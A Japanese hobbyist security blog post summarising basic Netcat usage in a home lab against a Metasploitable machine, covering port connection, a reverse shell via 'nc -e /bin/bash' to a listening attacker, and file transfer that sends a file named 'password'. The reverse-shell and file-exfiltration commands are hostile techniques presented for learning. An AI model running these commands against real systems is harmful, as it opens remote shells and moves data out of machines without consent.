ウサギは後退せず、大きな耳で情報集めをする事に験を担ぎ、古来より日本では鎧などにウサギの図柄を取り入れてきたらしい。

うさブロ

ぼっちなうさぎのセキュリティラボ

とある親父の侵入実験【Netcatの使い方】

f:id:appleseedj073:20170503114540p:plain

今更感が半端ないんだけど、便利なネットワークツール「Netcat」の基本的な使い方を勉強してみたのでまとめておく。

 

f:id:appleseedj073:20170514011537j:plain

今回は以下のサイトを参考にして勉強しました。

www.hackingarticles.in

 

Port Knocking

 nc IPアドレス ポート番号

f:id:appleseedj073:20170813113021p:plain

ncコマンドを使用してポート番号にアクセスすると、そのポート番号を使用しているサービスを調べられる。 

 

Reverse Shell

netcatって言ったらこれかな?てか、ちゃんと調べるまで使用用途はこれしか知らなかったw 

Reverse Shellなんで標的となるVictim側から接続先のAttackerへConnectする。

待受側(Attacker)

 nc -lvp ポート番号

指定したポートで、標的からのReverse接続を待ち受ける。

f:id:appleseedj073:20170813135304p:plain

 

接続側(Victim)

 nc IPアドレス ポート番号

これで接続できる。でも、

 nc -e /bin/bash IPアドレス ポート番号

の方が、接続した時のshellを指定できるしなんとなく便利だから使うようにしている。

f:id:appleseedj073:20170813135400p:plain

 

接続すると

f:id:appleseedj073:20170813135430p:plain

待受側で接続が開始されたメッセージが表示される。

一応、確認するw

f:id:appleseedj073:20170813135604p:plain

Victim端末はmetasploitableなので間違いなくReverse接続されている。

 

ファイル転送

Reverse接続の応用で、入出力先をファイルにすることでファイルの転送もできる。

先ほどと同じ要領で待ち受けて、出力をファイルにリダイレクトする。

※passというファイルに保存されるようにした

f:id:appleseedj073:20170813142500p:plain

同じく接続も先ほどと同じ要領にしつつ入力をファイルに

※passwordというファイルを作成し入力ファイルにした

f:id:appleseedj073:20170813142527p:plain

接続が行われるとファイルが作成される。

f:id:appleseedj073:20170813142541p:plain

f:id:appleseedj073:20170813142638p:plain

 

他にもポートスキャンが出来たり、HTTPリクエストが出来たりするようだけど、Reverse接続とファイル転送が出来ればそれで十分かなと思うので他は割愛。